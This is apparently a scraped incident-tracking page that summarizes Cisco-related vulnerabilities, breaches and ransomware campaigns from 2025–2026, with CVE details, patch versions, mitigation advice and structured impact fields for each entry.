The second vulnerability, CVE-2026-20963, affects Microsoft Office SharePoint and allows remote code execution (RCE) via deserialization of untrusted data. While no public reports detail its exploitation, CISA’s inclusion in the Known Exploited Vulnerabilities (KEV) catalog confirms its use in attacks. Federal agencies must patch it by March 23, 2026.

### Broader Threat Landscape: Edge Device Exploits

The advisory follows Amazon’s disclosure that Interlock ransomware operators exploited a maximum-severity Cisco firewall flaw (CVE-2026-20131, CVSS 10.0) as a zero-day since January 26, 2026, weeks before public disclosure. The group has historically targeted education, healthcare, manufacturing, and government sectors, where operational disruption maximizes ransom pressure. CISA added CVE-2026-20131 to its KEV catalog on March 19, 2026, mandating federal agencies to patch by March 22, 2026. The agency also issued an emergency directive for Cisco Catalyst SD-WAN vulnerabilities (CVE-2026-20127, CVE-2022-20775, CVE-2026-20122, CVE-2026-20128), which have been actively exploited, requiring agencies to submit logs by March 23, 2026. VulnCheck further warned that CVE-2026-20133, another Catalyst SD-WAN flaw, could enable privilege escalation to root by leaking the `vmanage-admin` private key and `confd_ipc_secret`. The firm cautioned that early exploit research may not capture all attack vectors, emphasizing the need for comprehensive patching. Federal agencies must apply fixes for CVE-2025-66376 by April 1, 2026, and for CVE-2026-20963 by March 23, 2026.
INCIDENT DETAILS -
TYPE
Cyberespionage
Remote Code Execution
MOTIVATION
Cyberespionage, Data Exfiltration, Operational Disruption
IMPACT
Credentials
Session tokens
2FA backup codes
Browser-saved passwords
90 days of email data
Synacor Zimbra Collaboration Suite (ZCS)
Microsoft Office SharePoint
Cisco Firewall
Operational Impact: Operational disruption in targeted sectors (education, healthcare, manufacturing, government)
Identity Theft Risk: High (PII exposure)
DATA BREACH
Credentials
Session tokens
2FA backup codes
Browser-saved passwords
Email data
Sensitivity Of Data: High (PII, government communications)
Vulnerability
22 Jan 2026 Cisco
Cisco: Cisco Unified Communications 0-day RCE Vulnerability Exploited in the Wild to Gain Root Access

Critical Zero-Day in Cisco Unified Communications Exploited in the Wild

323 After Incident
CRITICAL-3
CIS1769059373
Cisco has disclosed CVE-2026-20045, a critical zero-day remote code execution (RCE) vulnerability actively exploited in attacks targeting its Unified Communications (UC) products. The flaw allows unauthenticated attackers to execute arbitrary commands on the underlying operating system, potentially escalating to root-level access. The vulnerability stems from improper input validation in HTTP requests to the web-based management interface. Attackers can bypass authentication by sending crafted requests, initially executing commands at the user level before escalating privileges. Cisco rated the flaw Critical under its Security Impact Rating (SIR), emphasizing the severity of root-level compromise.

### Affected Products

The vulnerability impacts the following Cisco products, regardless of configuration:

- Unified Communications Manager (Unified CM)
- Unified CM Session Management Edition (SME)
- Unified CM IM & Presence Service (IM&P)
- Unity Connection
- Webex Calling Dedicated Instance

Other products, including Contact Center SIP Proxy and Unified CCE, are confirmed unaffected. A full list is available in Cisco’s advisory.

### Exploitation & Risk

Cisco’s Product Security Incident Response Team (PSIRT) confirmed real-world exploitation, with attackers likely using automated scanners to target exposed management interfaces. Enterprises running vulnerable VoIP and UC deployments, particularly in hybrid work environments, face heightened risk, as exploitation only requires network access to the management interface, often exposed via firewalls or VPNs. No workarounds exist, and Cisco has released patches and fixed releases for affected versions. Organizations must migrate or apply version-specific updates immediately.

Key fixed releases include:

- Unified CM, IM&P, SME, Webex Calling: 14SU5, 14SU4a patch, or 15SU4 (March 2026)
- Unity Connection: 14SU5, 14SU4 patch, or 15SU4 (March 2026)

The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-20045 to its Known Exploited Vulnerabilities Catalog, underscoring the urgency of remediation.

### Mitigation & Detection

Cisco recommends:

- Applying patches immediately (no workarounds available).
- Restricting management interface access to trusted IP addresses via firewalls.
- Monitoring logs for anomalous HTTP requests.

The flaw was reported by an external researcher, whom Cisco credited in its advisory. The incident highlights the growing risks to UC platforms amid rising RCE exploitation trends.
INCIDENT DETAILS -
TYPE
Zero-Day Exploitation
IMPACT
Systems Affected: Unified Communications Manager (Unified CM), Unified CM Session Management Edition (SME), Unified CM IM & Presence Service (IM&P), Unity Connection, Webex Calling Dedicated Instance
Operational Impact: Potential root-level access, arbitrary command execution, and system compromise
Brand Reputation Impact: High (Critical vulnerability with active exploitation)
JANUARY 2026
322 Before Incident
Vulnerability
07 Jan 2026 Cisco
Cisco: Cisco Patches ISE Security Vulnerability After Public PoC Exploit Release

CVE-2026-20029: Cisco ISE and ISE-PIC XML Parsing Vulnerability

321 After Incident
LOW-1
CIS1767871927
Cisco Patches Medium-Severity Flaws in ISE and Snort 3, Including Exploitable XML Vulnerability

Cisco has released security updates to address three medium-severity vulnerabilities, including one with a public proof-of-concept (PoC) exploit. The most notable flaw, CVE-2026-20029 (CVSS 4.9), affects Cisco Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC), allowing authenticated attackers with administrative privileges to access sensitive files on the underlying OS. The vulnerability stems from improper XML parsing in the web-based management interface. An attacker could exploit it by uploading a malicious file, potentially reading restricted system files.

Bobby Gould of Trend Micro Zero Day Initiative reported the issue, which impacts:

- ISE/ISE-PIC versions prior to 3.2 (users must migrate to a fixed release)
- 3.2 (patch with 3.2 Patch 8)
- 3.3 (patch with 3.3 Patch 8)
- 3.4 (patch with 3.4 Patch 4)
- 3.5 (not vulnerable)

Cisco confirmed the availability of a PoC exploit but reported no active exploitation in the wild. No workarounds exist, making updates the only mitigation.

Additionally, Cisco patched two Snort 3-related flaws in its Secure Firewall Threat Defense (FTD) Software, IOS XE Software, and Meraki software:

- CVE-2026-20026 (CVSS 5.8): A denial-of-service (DoS) vulnerability in Snort 3’s DCE/RPC processing, allowing unauthenticated attackers to crash the detection engine.
- CVE-2026-20027 (CVSS 5.3): An information disclosure bug in the same component, enabling data leaks.

Guy Lederfein of Trend Micro reported these issues, which require Snort 3 to be configured for exploitation. Cisco has released fixes for all affected products.
INCIDENT DETAILS -
TYPE
Information Disclosure
IMPACT
Data Compromised: Sensitive information
Systems Affected: Cisco ISE and ISE-PIC underlying operating system files
DATA BREACH
Type Of Data Compromised: Sensitive information
Sensitivity Of Data: High (arbitrary files from underlying OS)
JANUARY 2026
324 Before Incident
Vulnerability
01 Jan 2026 Cisco
Cisco: New Cisco Network Vulnerability Let Remote Attacker Cause DoS Attack

Cisco Patches High-Severity DoS Vulnerability in Network Management Tools

321 After Incident
HIGH-3
CIS1778171136
Cisco has disclosed a critical vulnerability (CVE-2026-20188, CVSS 7.5) affecting its Crosswork Network Controller (CNC) and Network Services Orchestrator (NSO), which could allow unauthenticated, remote attackers to trigger a Denial-of-Service (DoS) condition. The flaw stems from uncontrolled resource consumption (CWE-400), where affected systems fail to enforce rate-limiting on incoming connections. Attackers can exploit this by flooding a server with excessive requests, exhausting available resources and rendering the system unresponsive. Recovery requires a manual reboot, disrupting network operations and locking out administrators.

### Affected Versions & Fixes

- Cisco Crosswork Network Controller (CNC):
  - Vulnerable: Version 7.1 and earlier
  - Fixed: Version 7.2 (unaffected)
- Cisco Network Services Orchestrator (NSO):
  - Vulnerable: Versions 6.3 and earlier, 6.4 (up to 6.4.1.2)
  - Fixed: 6.4.1.3 and later; 6.5+ (unaffected)

Cisco discovered the issue internally (Bug ID CSCwr08237) while resolving a support case. While no active exploitation or public PoC exploits have been observed, the company warns that no workarounds exist; upgrading to patched versions is the only mitigation. Organizations using vulnerable deployments are advised to apply updates immediately to prevent potential service disruptions.
INCIDENT DETAILS -
TYPE
Denial-of-Service (DoS)
IMPACT
Systems Affected: Crosswork Network Controller (CNC), Network Services Orchestrator (NSO)
Downtime: Requires manual reboot
Operational Impact: Network operations disruption, administrator lockout
Vulnerability
01 Jan 2026 Cisco
Cisco: Critical Cisco Smart Software Manager Vulnerability Enables Arbitrary Command Execution

Critical Cisco SSM On-Prem Vulnerability Grants Root Access to Attackers

321 After Incident
CRITICAL-3
CIS1775125662
Cisco has disclosed a critical unauthenticated remote code execution (RCE) vulnerability in its Smart Software Manager On-Prem (SSM On-Prem) platform, tracked as CVE-2026-20160 with a CVSS score of 9.8. The flaw allows unauthenticated, remote attackers to execute arbitrary commands with root privileges, granting full control over affected systems. The vulnerability stems from an exposed internal service in SSM On-Prem, which can be exploited via specially crafted HTTP requests to the platform’s API without requiring authentication or user interaction.

Given its severity, the flaw is highly attractive for automated, large-scale attacks. A successful exploit could enable threat actors to pivot laterally across networks, exfiltrate sensitive data, or deploy ransomware and other malicious payloads. Cisco SSM On-Prem is widely used for enterprise license management, meaning a compromise could have severe implications for core infrastructure.

Cisco’s Product Security Incident Response Team (PSIRT) identified the issue internally while addressing a support case. As of the advisory’s release, no active exploitation has been observed, but the lack of authentication requirements and the flaw’s critical severity heighten the risk of imminent attacks.

Affected Versions:

- Vulnerable: SSM On-Prem releases 9-202502 through 9-202510
- Fixed: SSM On-Prem version 9-202601
- Not affected: Releases before 9-202502, Cisco Smart Licensing Utility, and SSM satellite products

Cisco has confirmed that no workarounds or mitigations exist; the only remediation is applying the official patch. Organizations running affected versions are urged to prioritize upgrades to prevent potential enterprise-wide compromise.
INCIDENT DETAILS -
TYPE
Remote Code Execution (RCE)
IMPACT
Data Compromised: Sensitive data exfiltration possible
Systems Affected: Cisco SSM On-Prem (versions 9-202502 through 9-202510)
Operational Impact: Full system compromise, lateral movement, ransomware deployment possible
DATA BREACH
Type Of Data Compromised: Sensitive enterprise data (potential)
Sensitivity Of Data: High (enterprise license management data)
Data Exfiltration: Possible
DECEMBER 2025
321 Before Incident
Vulnerability
18 Dec 2025 Cisco
Cisco: Cisco Warns of Active Cyberattack Exploiting Critical AsyncOS Vulnerability

Cisco Secure Email Gateway and Web Manager Appliances Exploited via CVE-2025-20393

320 After Incident
CRITICAL-1
CIS1766051696
Critical Cisco Secure Email Gateway Vulnerability Exploited in Ongoing Attacks

Cisco has disclosed an active cyberattack campaign targeting vulnerabilities in its Cisco Secure Email Gateway and Cisco Secure Email and Web Manager appliances running Cisco AsyncOS Software. The flaw, tracked as CVE-2025-20393 (CVSS 10.0), allows threat actors to execute arbitrary commands with root privileges, enabling full system compromise. The vulnerability affects both physical and virtual instances of the appliances when the Spam Quarantine feature is enabled and exposed to the internet—a configuration not enabled by default per Cisco’s deployment guidelines. Cisco Secure Email Cloud remains unaffected, and there is no evidence of exploitation targeting Cisco Secure Web.

### Attack Details & Timeline

The campaign was first detected through a Cisco Technical Assistance Center (TAC) case, with Cisco Talos confirming active exploitation. Attackers exploited exposed ports to gain unauthorized root access, disable security tools, and establish persistence mechanisms for long-term control. Compromised appliances may require a full rebuild to remove embedded threats.

### Mitigation & Hardening Measures

Cisco has stated that no direct workarounds exist for CVE-2025-20393. Organizations are advised to:

- Restrict appliance access to trusted hosts and avoid direct internet exposure.
- Deploy behind firewalls, filtering traffic to allow only authorized communication.
- Separate mail and management interfaces to limit internal access risks.
- Monitor web logs and forward them to external servers for analysis.
- Disable unnecessary services (HTTP, FTP) and enforce SSL/TLS with trusted certificates.
- Upgrade to the latest AsyncOS release and implement strong authentication (SAML, LDAP).

### Broader Impact

The incident highlights risks posed by misconfigured network services, emphasizing the need for immediate exposure assessment, access restrictions, and continuous monitoring. Organizations should consult Cisco TAC if compromise is suspected.
INCIDENT DETAILS -
TYPE
Cyberattack
IMPACT
Systems Affected: Cisco Secure Email Gateway and Cisco Secure Email and Web Manager appliances
Operational Impact: Unauthorized root access, persistence mechanisms, and potential data exfiltration
Brand Reputation Impact: Potential reputational damage due to system compromise
DATA BREACH
Data Exfiltration: Potential data exfiltration via covert channels
NOVEMBER 2025
336 Before Incident
Breach
12 Nov 2025 Cisco
Shinhan Card: Shinhan Card reports data breach involving 190,000 merchant records

Shinhan Card Personal Data Breach Involving Merchant Representatives

309 After Incident
HIGH-27
SHI1766477260
Shinhan Card Reports Data Breach Affecting 190,000 Merchant Representatives

Shinhan Card disclosed a data breach involving approximately 192,088 records of merchant representatives, marking the latest in a series of recent leaks affecting major South Korean firms, including Coupang, KT, SK Telecom, and Lotte Card. The incident, reported to the Personal Information Protection Commission (PIPC) on Tuesday, was attributed to internal employee misconduct related to new card solicitation rather than external hacking.

The exposed data included:

- 181,585 records containing only mobile phone numbers
- 8,120 records with phone numbers and names
- 2,310 records with phone numbers, names, birth years, and gender
- 73 records with phone numbers, names, and full dates of birth

Shinhan Card confirmed that no highly sensitive information—such as resident registration numbers, card details, or bank accounts—was compromised. The breach was limited to merchant representatives, with no impact on individual cardholders. The company stated that the leak stemmed from isolated employee actions and posed no further dissemination risk.

The case came to light after a whistleblower submitted evidence to the PIPC, prompting an investigation. Shinhan Card began reviewing the allegations on November 13, verifying the breach through internal records. Following the findings, the company issued a public apology, notified affected merchants, and launched a webpage for individuals to check their exposure. While Shinhan Card has taken measures equivalent to those for a data breach, further review is needed to classify the incident officially. The company pledged to strengthen protections to prevent future occurrences.

### Security Investment Trends Lag Despite Rising Breaches

A recent survey by market tracker Leaders Index revealed that while major South Korean firms increased IT spending by 31.2% (from 16.5 trillion won in 2022 to 21.6 trillion won in 2024), information security investment grew only marginally in proportion—from 5.8% to 5.9% of total IT budgets. Security staffing saw a similar trend, with dedicated personnel rising 22.3% but remaining at just 6.7% of IT workforce share. Analysts noted that despite absolute increases, security priorities continue to trail broader technology spending.
INCIDENT DETAILS -
TYPE
Data Breach
MOTIVATION
New Card Solicitation (Non-Malicious)
IMPACT
Data Compromised: 192,088 records
Brand Reputation Impact: Yes
Identity Theft Risk: Low (No highly sensitive data exposed)
Payment Information Risk: None (No card or bank details compromised)
DATA BREACH
Mobile phone numbers
Names
Year of birth
Gender
Full dates of birth
Number Of Records Exposed: 192,088
Sensitivity Of Data: Low to Moderate (No resident registration numbers, card numbers, or bank details)
Data Exfiltration: No evidence of further dissemination
Personally Identifiable Information: Yes (Phone numbers, names, dates of birth)
NOVEMBER 2025
421 Before Incident
Ransomware
10 Nov 2025 Cisco
Cisco

Yanluowang Ransomware Attacks Facilitated by Initial Access Broker Aleksey Volkov

336 After Incident
CRITICAL-85
CIS0702107111125
Cisco, a multinational technology conglomerate, was targeted by the Yanluowang ransomware gang in a sophisticated attack facilitated by Aleksey Volkov, an initial access broker. The group exploited network vulnerabilities to infiltrate Cisco’s systems, deploying ransomware that encrypted critical data and disrupted operations. While the article does not specify the exact financial or data losses Cisco incurred, the broader context of Yanluowang’s operations—including extortion demands, DDoS attacks, and threats to executives—suggests severe operational and reputational harm. The gang’s tactics often involved stealing sensitive corporate or customer data before encrypting systems, then demanding ransom payments under threat of public exposure or prolonged outages. Cisco’s inclusion among high-profile victims (alongside Walmart) underscores the attack’s strategic intent to cripple infrastructure and extract maximum financial gain. The involvement of a Russian national linked to defense ministry ties further elevates the attack’s geopolitical and cybersecurity significance, aligning with Yanluowang’s pattern of targeting Western enterprises with precision.
INCIDENT DETAILS -
TYPE
Ransomware
Initial Access Brokerage
DDoS Attacks
Extortion
MOTIVATION
Financial Gain (ransomware proceeds, access sales)
IMPACT
Financial Loss: $1.5M+ (confirmed ransom payments) + $9M (restitution agreed in plea deal)
System Lockouts
DDoS Disruptions
Executive Threats
High (targeted high-profile U.S. firms)
Associated with extortion tactics
Plea deal for hacking, extortion, and theft charges
Decades-long prison sentence pending
DATA BREACH
Likely (based on ransomware MO)
Yanluowang custom encryption (vulnerability found by Kaspersky)
NOVEMBER 2025
420 Before Incident
Vulnerability
01 Nov 2025 Cisco
SolarWinds, SonicWall and Cisco: Payouts King ransomware uses QEMU VMs to bypass endpoint security

Payouts King Ransomware Abuses QEMU for Stealthy Attacks

419 After Incident
CRITICAL-1
SOLSONCIS1776457498
The Payouts King ransomware operation is leveraging the QEMU emulator as a reverse SSH backdoor to deploy hidden virtual machines (VMs) on compromised systems, evading endpoint security detection. QEMU, an open-source virtualization tool, allows attackers to execute malicious payloads, store files, and establish covert remote access, tactics previously observed in campaigns by 3AM ransomware, LoudMiner, and CRON#TRAP.

### Two Active Campaigns

Cybersecurity firm Sophos identified two distinct campaigns exploiting QEMU:

1. STAC4713 (Payouts King)
   - First observed in November 2025, linked to the GOLD ENCOUNTER threat group.
   - Initial access via exposed SonicWall VPNs and later through SolarWinds Web Help Desk (CVE-2025-26399).
   - More recent attacks used Cisco SSL VPN exploits and Microsoft Teams phishing, tricking employees into installing QuickAssist.
   - Attackers deploy a hidden Alpine Linux VM (v3.22.0) via a scheduled task (TPMProfiler), disguising virtual disks as databases or DLLs.
   - Tools inside the VM include AdaptixC2, Chisel, BusyBox, and Rclone, with reverse SSH tunnels for persistence.
   - Post-infection, they exfiltrate NTDS.dit, SAM, and SYSTEM hives via SMB and Rclone to remote SFTP servers.
2. STAC3725 (CitrixBleed 2 Exploitation)
   - Active since February 2025, targeting NetScaler ADC/Gateway (CVE-2025-5777).
   - After compromise, attackers deploy a ZIP archive containing a malicious executable that:
     - Installs a service (AppMgmt).
     - Creates a local admin user (CtxAppVCOMService).
     - Deploys ScreenConnect for persistence.
   - A QEMU-based Alpine Linux VM is then launched, where attackers manually install tools like Impacket, KrbRelayx, BloodHound.py, and Metasploit for credential harvesting, AD reconnaissance, and data exfiltration via FTP.

### Ransomware Tactics & Attribution

Payouts King employs AES-256 (CTR) + RSA-4096 encryption, intermittent file encryption, and anti-analysis techniques. Ransom notes direct victims to dark web leak sites. Zscaler suggests ties to former BlackBasta affiliates, citing similar initial access methods (e.g., spam bombing, Teams phishing, Quick Assist abuse). The group also terminates security tools via low-level system calls and establishes persistence through scheduled tasks. Organizations are advised to monitor for unauthorized QEMU installations, suspicious SYSTEM-level tasks, and unusual SSH port forwarding.
INCIDENT DETAILS -
TYPE
Ransomware
MOTIVATION
Financial gain
IMPACT
NTDS.dit
SAM
SYSTEM hives
Personally Identifiable Information (PII)
SonicWall VPN
SolarWinds Web Help Desk
Cisco SSL VPN
Microsoft Teams
NetScaler ADC/Gateway
Active Directory
Operational Impact: Disruption due to ransomware encryption and data exfiltration
Brand Reputation Impact: Potential damage due to data breach and ransomware attack
Identity Theft Risk: High (due to PII exposure)
DATA BREACH
Active Directory credentials
System hives
Personally Identifiable Information (PII)
Sensitivity Of Data: High (PII, credentials, system files)
Data Encryption: AES-256 (CTR) + RSA-4096
NTDS.dit
SAM
SYSTEM hives
OCTOBER 2025
479 Before Incident
Ransomware
20 Oct 2025 Cisco
Kettering Health

ClickFix (Fake CAPTCHA) Social Engineering Attacks

417 After Incident
CRITICAL-62
KET5232452102025
Kettering Health, a major healthcare provider, fell victim to a ClickFix attack linked to the Interlock ransomware group, resulting in a significant data breach. The attack exploited social engineering tactics, tricking employees into executing malicious scripts via browser-based lures (e.g., fake CAPTCHAs or error-fixing prompts). The malicious payload was copied to the clipboard via obfuscated JavaScript and executed locally, bypassing traditional email security and endpoint detection. The breach compromised sensitive patient and employee data, including medical records, financial details, and personally identifiable information (PII). The attack leveraged SEO poisoning and malvertising via Google Search, evading conventional phishing defenses. Despite EDR (Endpoint Detection and Response) being the last line of defense, the obfuscated, user-initiated commands delayed detection, allowing the ransomware to encrypt critical systems. The incident disrupted healthcare operations, risked patient safety due to delayed treatments, and exposed Kettering Health to reputational damage, financial penalties, and potential legal liabilities. The breach underscored vulnerabilities in both technical controls and user awareness, particularly against browser-based, fileless attacks.
INCIDENT DETAILS -
TYPE
Social Engineering, Malvertising, SEO Poisoning, Clipboard Hijacking, Fake CAPTCHA, Watering Hole Attack
MOTIVATION
Financial Gain (Ransomware, Data Theft), Credential Harvesting, Lateral Movement for Targeted Attacks, Espionage (APT-Linked), Session Hijacking
IMPACT
Credentials (Stored in Browsers), Cookies (Session Tokens), Potentially PII (Depending on Follow-on Exploitation); Endpoints (User Devices), Browsers (Chrome, Edge, Firefox, etc.), Potential Network Lateral Movement; Disruption from Ransomware (Linked Cases), Incident Response Overhead, Productivity Loss (User Remediation); Erosion of Trust (Phishing/Social Engineering), Associated with High-Profile Breaches (e.g., Healthcare, Education); High (If Credentials/Cookies Stolen); Potential (If Browser-Stored Payment Data Accessed)
DATA BREACH
Credentials, Session Cookies, Potentially PII (Context-Dependent); High (If Credentials/Cookies Lead to Further Compromise); Likely (For Ransomware/APT Groups); Possible (If Follow-on Attacks Occur)
SEPTEMBER 2025
481Before Incident
Cyber Attack
26 Sep 2025Cisco
Cisco

Advanced Espionage Campaign Targeting Cisco ASA Devices (ArcaneDoor)

474After Incident
CRITICAL-7
CIS5802058092725
Government cyber agencies globally, including Canada’s CSE and the U.S. CISA, have issued urgent warnings about a sophisticated state-sponsored espionage campaign (ArcaneDoor) exploiting vulnerabilities in Cisco’s Adaptive Security Appliances (ASA), widely used as VPN gateways by remote workers and critical infrastructure operators. The attackers implanted malware, executed commands, and potentially exfiltrated data from compromised devices, targeting legacy systems with malware built for evasion. The U.S. mandated that federal agencies patch the vulnerabilities within 24 hours, labeling the threat a significant risk to victim networks. The UK’s NCSC noted the malware’s growing sophistication, while Cisco confirmed the actor’s focus on espionage. Critical sectors, including government, academia, and research facilities, were urged to act immediately. The attack’s scope remains under investigation, but its persistence mechanisms and the potential for theft of high-value data (state secrets, intellectual property) pose severe operational and national security risks. Because the compromised devices are VPN concentrators, a foothold on them can enable lateral movement into the networks behind them, amplifying the threat to organizational integrity and confidentiality.
INCIDENT DETAILS -
TYPE
Espionage, Cyberattack, Advanced Persistent Threat (APT)
MOTIVATION
Espionage
IMPACT
Cisco Adaptive Security Appliances (ASA), VPN-enabled systems used by remote workers; Operational Impact: High (potential data exfiltration, command execution, and malware persistence in critical infrastructure sectors); Brand Reputation Impact: Moderate to High (urgent global warnings issued by cyber agencies)
DATA BREACH
Data Exfiltration: Potential (malware designed for exfiltration)
SEPTEMBER 2025
490Before Incident
Cyber Attack
18 Sep 2025Cisco
Salesforce

ShinyHunters Exploits Compromised Drift OAuth Tokens to Steal 1.5B Salesforce Records

479After Incident
CRITICAL-11
SAL5732257091825
The ShinyHunters extortion group exploited compromised Drift OAuth tokens linked to Salesloft to steal over 1.5 billion Salesforce records from 760 companies. Attackers used social engineering and malicious OAuth apps to infiltrate Salesforce environments, exfiltrating massive volumes of CRM data, including 250M Account records, 579M Contact records, 171M Opportunity records, 60M User records, and 459M Case records. The breach originated from a compromise of Salesloft’s GitHub repositories, where attackers ran TruffleHog to extract secrets, including OAuth tokens for Drift and Drift Email, which granted access to Salesforce-integrated systems. The stolen Case data was then mined for AWS keys, Snowflake tokens, and other credentials contained in support-ticket text, facilitating deeper intrusions into victim networks. High-profile targets allegedly include Google, Cloudflare, Palo Alto Networks, Zscaler, Tenable, CyberArk, and others. The attackers demanded ransom payments to prevent data leaks, while continuing to search the stolen data for additional secrets to expand their campaign. The FBI issued an advisory on the threat actors (UNC6040 and UNC6395), warning of ongoing risk. Salesforce advised customers to enforce MFA, least-privilege access, and stricter management of connected OAuth apps to limit exposure.
INCIDENT DETAILS -
TYPE
Data Breach, Extortion, Unauthorized Access, Credential Theft
MOTIVATION
Financial Gain (Extortion), Data Theft for Resale, Reputation Damage, Further Intrusion (Credential Harvesting)
IMPACT
Salesforce Account: 250 million records; Salesforce Contact: 579 million records; Salesforce Opportunity: 171 million records; Salesforce User: 60 million records; Salesforce Case: 459 million records; Total: 1.5 billion records; Salesforce CRM, Drift AI Chat/Email Services, Salesloft Platform, GitHub Repository (Salesloft), Connected Applications (AWS, Snowflake, etc.); Unauthorized Data Access, Extortion Threats, Potential Further Intrusions via Stolen Credentials, Reputation Damage for Affected Companies; High (Public Disclosure of Breach); Loss of Customer Trust, Potential Regulatory Scrutiny; High (PII in Contact/Account Records); Credential Stuffing Risk
DATA BREACH
CRM Data (Salesforce Objects): Account Records, Contact Records (PII), Opportunity Records, User Records, Case Records (Support Tickets); AWS Keys, Snowflake Tokens, Other Credentials; Number Of Records Exposed: 1.5 billion; High (PII, Business-Critical CRM Data, Credentials); Confirmed (Massive Scale); Evidence: Shared File Listing Salesloft’s Breached Source Code Folders; Salesforce Database Records, Source Code (Salesloft GitHub), Configuration Files, API Keys/Secrets, Contact Records (Names, Email Addresses, Phone Numbers, etc.), User Records (Employee/Client Data)
SEPTEMBER 2025
494Before Incident
Cyber Attack
01 Sep 2025Cisco
U.S. federal agency: CISA: US agency breached through Cisco vulnerability, FIRESTARTER backdoor allowed access through March

U.S. Government Agency Breached via Cisco Firewall Vulnerabilities, Persistent Malware Detected

487After Incident
CRITICAL-7
US-1776976007
U.S. Government Agency Breached via Cisco Firewall Vulnerabilities, Persistent Malware Detected
In September 2025, a U.S. federal agency was compromised by sophisticated hackers exploiting vulnerabilities in Cisco Adaptive Security Appliances (ASA). The Cybersecurity and Infrastructure Security Agency (CISA) revealed that the attackers deployed FIRESTARTER, malware that gives persistent access to compromised Cisco Firepower devices without having to re-exploit the original flaws. The breach was discovered through CISA’s continuous monitoring, which detected suspicious connections from an agency Cisco Firepower device running ASA software. Forensic analysis found FIRESTARTER, installed before September 25, 2025, which the attackers used to regain access in March 2026. The attackers also used Line Viper, a second malware component, to establish unauthorized VPN sessions, bypass authentication, and extract administrative credentials, certificates, and private keys. The vulnerabilities, CVE-2025-20333 and CVE-2025-20362, were first flagged by CISA in September 2025, when federal agencies were ordered to patch them. CISA later confirmed that patched systems could still be compromised, because FIRESTARTER persists independently of the flaws it was installed through. The agency also noted that the attackers used dormant federal accounts to maintain access. CISA has not attributed the attack, but reporting points to China-linked state interests, consistent with earlier campaigns such as ArcaneDoor (2024); Cisco’s analysis supports this assessment and links the activity to the same threat actors. In response, CISA issued updated directives requiring federal agencies to:
- Conduct malware checks by May 1, 2026, with initial confirmations due by midnight on Friday.
- Submit an inventory of all Cisco Firepower devices by May 1.
- Follow CISA’s guidance for physical disconnection of infected devices if necessary.
CISA emphasized that standard patching does not remove FIRESTARTER, and warned agencies not to unplug devices without explicit instructions, since doing so can destroy volatile evidence. The agency will compile a report on the campaign for the National Cyber Director and the White House by August 1, 2026. The incident underscores the risk of persistent malware in security infrastructure itself, particularly in widely deployed Cisco ASA and Firepower Threat Defense (FTD) systems.
INCIDENT DETAILS -
TYPE
Data Breach, Persistent Malware, Unauthorized Access
MOTIVATION
Cyber espionage, Persistent access
IMPACT
Data Compromised: Administrative credentials, certificates, private keys; Systems Affected: Cisco Firepower devices running ASA software; Operational Impact: Unauthorized VPN sessions, bypassed authentication, persistent access; Brand Reputation Impact: High (U.S. federal agency); Identity Theft Risk: High (credentials and PII exposure)
DATA BREACH
Administrative credentials, Certificates, Private keys; Sensitivity Of Data: High; Data Exfiltration: Yes; Personally Identifiable Information: Likely (credentials)
AUGUST 2025
488Before Incident
Vulnerability
01 Aug 2025Cisco
Cisco

Active Exploitation of Cisco ASA and FTD Vulnerabilities (CVE-2025-20333, CVE-2025-20362)

487After Incident
CRITICAL-1
CIS0692106093025
Over 48,800 internet-exposed Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) devices remain vulnerable to two flaws (CVE-2025-20333 and CVE-2025-20362) which, chained together, give an unauthenticated remote attacker arbitrary code execution and unauthorized access to VPN endpoints. Exploitation began before patches were available, with threat actors deploying a shellcode loader (Line Viper) and a GRUB bootkit (RayInitiator). The U.S. CISA issued an emergency directive ordering federal agencies to patch or disconnect affected devices within 24 hours, and the U.K.’s NCSC confirmed active attacks. Despite warnings since late August, most exposed devices, concentrated in the U.S., U.K., Japan, and Germany, remain unpatched, risking full system compromise, lateral movement, and data exfiltration. With no workarounds available, unpatched organizations are exposed to persistent access and malware deployment, and to downstream intrusions if a compromised firewall is used to pivot into the corporate network behind it.
INCIDENT DETAILS -
TYPE
Vulnerability Exploitation, Unauthorized Access, Malware Deployment
MOTIVATION
Opportunistic Exploitation, Potential Data Theft, Malware Distribution
IMPACT
Systems Affected: ~50,000 internet-exposed ASA/FTD devices (48,800 confirmed unpatched as of 2025-09-29); Potential Unauthorized VPN Access; Malware Infection (Line Viper, RayInitiator); Risk of Lateral Movement; Potential Erosion of Trust in Cisco Security Products; Regulatory Scrutiny; Non-Compliance with CISA Emergency Directive for Federal Agencies; Potential Violations of Data Protection Laws
JULY 2025
488Before Incident
Vulnerability
22 Jul 2025Cisco
Cisco

Critical Vulnerabilities in Cisco Identity Services Engine (ISE)

487After Incident
CRITICAL-1
CIS905072925
A security researcher has published a blog post demonstrating a complete exploit chain for CVE-2025-20281, a critical unauthenticated remote code execution vulnerability in Cisco Identity Services Engine (ISE). The flaw lets an unauthenticated, remote attacker upload arbitrary files to the target system and execute them with root privileges; it stems from unsafe deserialization and command injection in the enableStrongSwanTunnel() method. A second flaw, CVE-2025-20337, was fixed in the same releases. Although hotfixes were made available first, Cisco urged users to upgrade to ISE 3.3 Patch 7 or 3.4 Patch 2, which address both vulnerabilities. On July 22, 2025, Cisco marked both CVE-2025-20281 and CVE-2025-20337 as actively exploited in attacks and urged administrators to apply the updates as soon as possible.
INCIDENT DETAILS -
TYPE
Remote Code Execution
IMPACT
Systems Affected: Cisco ISE and ISE-PIC versions 3.3 and 3.4
JUNE 2025
487Before Incident
Cyber Attack
16 Jun 2025Cisco
Cisco

Exploitation of Cisco Firewall Zero-Day Vulnerabilities by ArcaneDoor (UAT4356/Storm-1849) to Deploy RayInitiator and LINE VIPER Malware

480After Incident
CRITICAL-7
CIS5262052092625
